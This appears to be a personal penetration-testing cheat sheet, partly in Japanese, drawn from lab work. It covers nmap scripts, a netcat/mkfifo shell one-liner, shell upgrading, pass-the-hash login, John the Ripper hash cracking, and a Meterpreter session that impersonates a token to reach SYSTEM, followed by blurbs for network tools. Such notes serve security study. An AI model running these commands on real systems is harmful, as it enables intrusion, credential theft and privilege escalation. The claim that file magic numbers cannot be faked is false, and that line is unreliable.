- auth:- Attempt to bypass authentication for running services (e.g. Log into an FTP server anonymously)
- brute:- Attempt to bruteforce credentials for running services
- discovery:- Attempt to query running services for further information about the network (e.g. query an SNMP server).
More can be found here.
https://nmap.org/book/nse-usage.html
How to find scripts
/usr/share/nmap/scripts/script.db
smb
smbのshareとユーザーをenumerateする
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.166.21
netcat が使用できない場合
mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f
The command first creates a named pipe at /tmp/f. It then starts a netcat listener, and connects the input of the listener to the output of the named pipe. The output of the netcat listener (i.e. the commands we send) then gets piped directly into sh, sending the stderr output stream into stdout, and sending stdout itself into the input of the named pipe, thus completing the circle.
Shell upgrading
nc でreverse shellをつないだばかりだと、Ctrl+cでshell全体がkillされたり、TABによるオートコンプリートや矢印キーでhistoryを探したりなどいろいろと不便。
Shellをupgradeすることでこれらを使いやすくする
# bash shellをスポーンする
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
# terminal commands を有効化する (clearコマンドなど)
$ export TERM=xterm
# Ctrl + z で一度jobを停止
(Ctrl + z)
# 自身のterminalに戻ってくるので以下のコマンド実行
# terminal echoをoffにする(これでTAB のコンプリート機能、矢印キーのヒストリー、Ctrl+Cでのプロセスキルなどができるようになる)
# そして、job を fgにする
$ stty raw -echo; fg
Windows registry (レジストリ)
Pass the Hash with Remote Desktop
pth-winexe -U 'admin%hash' //10.10.157.38 cmd.exe
LM and NTLM hashes を使ってログインする。 パスワードのクラックは不要。おどろき。
https://www.kali.org/penetration-testing/passing-hash-remote-desktop/
LFI & RFI (Local/Remote File Inclusion)
XXE
XXE stands for XML Eternal Entity Injection.
-
in-band XXE
An in-band XXE attack is the one in which the attacker can receive an immediate response to the XXE payload. -
out-of-band (OOB-XXE)
out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.
Payload Examples
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection
SSTI (Server Side Template Injection)
SSTI is when a user is able to pass in a parameter that can control the template engine that is running on the server.
Extension Validation
File Type Filtering
-
MIME Type
-
Magic Number
Indicate file type. Used in file type validation. Impossible to fake.
Use hexeditor
File Length Filtering
File Name Filtering
File Content Filtering
Cracking /etc/shadow
Usage: unshadow PASSWORD-FILE SHADOW-FILE
$ unshadow passwd shadow > rcvd
$ john --format=sha512crypt --wordlist=~/rockyou.txt rcvd
John single mode
Cracking using John's single mode - word mangling.
The hash file should be prepended with a word and a ":".
Joker:7bf6d9bb82bed1302f331fc6b816aada
Example:
$ john --show --format=raw-md5 hash7.txt
Joker:Jok3r
1 password hash cracked, 0 left
Define custom rules
Zip2John
zip2john [options] [zip file] > [output file]
RaR2John
rar2john [rar file] > [output file]
ssh2john
python3 /opt/john/ssh2john.py [id_rsa private key file] > [output file]
Search vulnerability (suggestion) on Windows
Windows Power Shell Priv-Esc Powerup
Windows Power Shell nishang
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
WinPEAS (Windows Privilege Escalation Awesome Scripts)
Windows Privilege Escalation Token Abuse
Metasploit Incoginito
meterpreter > load incognito
Loading extension incognito...Success.
example
C:\Users\bruce\Desktop>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
C:\Users\bruce\Desktop>^C
Terminate channel 1? [y/N] y
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens /g
Usage: list_tokens <list_order_option>
Lists all accessible tokens and their privilege level
OPTIONS:
-g List tokens by unique groupname
-u List tokens by unique username
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT AUTHORITY\WRITE RESTRICTED
NT SERVICE\AppHostSvc
NT SERVICE\AudioEndpointBuilder
NT SERVICE\BFE
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\Dnscache
NT SERVICE\eventlog
NT SERVICE\EventSystem
NT SERVICE\FDResPub
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\MMCSS
NT SERVICE\PcaSvc
NT SERVICE\PlugPlay
NT SERVICE\RpcEptMapper
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\Spooler
NT SERVICE\TrkWks
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\WinDefend
NT SERVICE\Winmgmt
NT SERVICE\WSearch
NT SERVICE\wuauserv
Impersonation Tokens Available
========================================
NT AUTHORITY\NETWORK
NT SERVICE\AudioSrv
NT SERVICE\DcomLaunch
NT SERVICE\Dhcp
NT SERVICE\DPS
NT SERVICE\lmhosts
NT SERVICE\MpsSvc
NT SERVICE\netprofm
NT SERVICE\nsi
NT SERVICE\PolicyAgent
NT SERVICE\Power
NT SERVICE\ShellHWDetection
NT SERVICE\W32Time
NT SERVICE\WdiServiceHost
NT SERVICE\WinHttpAutoProxySvc
NT SERVICE\wscsvc
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
396 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
524 516 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
572 564 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
580 516 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
608 564 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
668 580 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
676 580 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
684 580 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
772 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
848 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
920 608 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe
936 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
992 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1012 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1016 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1044 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe
1064 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1212 668 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1240 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1356 668 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1436 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1464 668 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe
1492 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1536 2812 powershell.exe x86 0 alfred\bruce C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
1628 668 jenkins.exe x64 0 alfred\bruce C:\Program Files (x86)\Jenkins\jenkins.exe
1720 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1756 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1828 1628 java.exe x86 0 alfred\bruce C:\Program Files (x86)\Jenkins\jre\bin\java.exe
1848 668 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
1940 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe
2452 668 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
2624 1536 rse.exe x86 0 alfred\bruce C:\Users\bruce\Desktop\rse.exe
2812 1828 cmd.exe x86 0 alfred\bruce C:\Windows\SysWOW64\cmd.exe
3024 668 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
3060 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
meterpreter > migrate 668
[*] Migrating from 2624 to 668...
[*] Migration completed successfully.
meterpreter >
HTTtrack Websit Copier
HTTrack is a free (GPL, libre/free software) and easy-to-use offline browser utility.
It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.
WinHTTrack is the Windows (from Windows 2000 to Windows 10 and above) release of HTTrack, and WebHTTrack the Linux/Unix/BSD release. See the download page.
Path Analyzer Pro
Path Analyzer Pro delivers advanced network route-tracing with performance tests, DNS, whois, and network resolution to investigate network issues. By integrating all these powerful features into one simple graphical interface, Path Analyzer Pro has become a must-have tool for any network, systems, or security professional on Windows and Mac OS X. Download a FREE trial copy.
Colasoft Packet Builder
Colasoft Packet Builder enables creating custom network packets; users can use this tool to check their network protection against attacks and intruders. Colasoft Packet Builder includes a very powerful editing feature. Besides common HEX editing raw data, it features a Decoding Editor allowing users to edit specific protocol field values much easier.
Users are also able to edit decoding information in two editors - Decode Editor and Hex Editor. Users can select one from the provided templates Ethernet Packet, ARP Packet, IP Packet, TCP Packet and UDP Packet, and change the parameters in the decoder editor, hexadecimal editor or ASCII editor to create packets. Any changes will be immediately displayed in the other two windows. In addition to building packets,Colasoft Packet Builder also supports saving packets to packet files and sending packets to network.
Megaping
MegaPing is the ultimate must-have toolkit that provides essential utilities for Information System specialists, system administrators, IT solution providers or individuals.
NetScanTools Pro
NetScanTools Pro is an integrated collection of internet information gathering and network troubleshooting utilities for Network Professionals. Research IPv4 addresses, IPv6 addresses, hostnames, domain names, email addresses and URLs automatically** or with manual tools. It is designed for the Windows operating system GUI. **Automated tools are started interactively by the user.
Network Topology Mapper
Network mapping software built to automatically plot your network
Key Features
Automate device discovery and mapping
Build multiple maps from a single scan
Export network diagrams to Visio
Auto-detect changes to network topology
Perform multi-level network discovery
Address regulatory PCI compliance
Angry IP Scanner
Angry IP scanner is a very fast IP address and port scanner.
It can scan IP addresses in any range as well as any their ports. It is cross-platform and lightweight. Not requiring any installations, it can be freely copied and used anywhere.
Angry IP scanner simply pings each IP address to check if it’s alive, then optionally it is resolving its hostname, determines the MAC address, scans ports, etc. The amount of gathered data about each host can be extended with plugins.
It also has additional features, like NetBIOS information (computer name, workgroup name, and currently logged in Windows user), favorite IP address ranges, web server detection, customizable openers, etc.
IP-Tools
IP-Tools is a great program that allows users to monitor their network activity and data movements. In addition to providing standard information about nodes connected to a network, the application allows monitoring of advanced parameters such as data flow. All in all, this is a great application for network administrators and advanced computer users.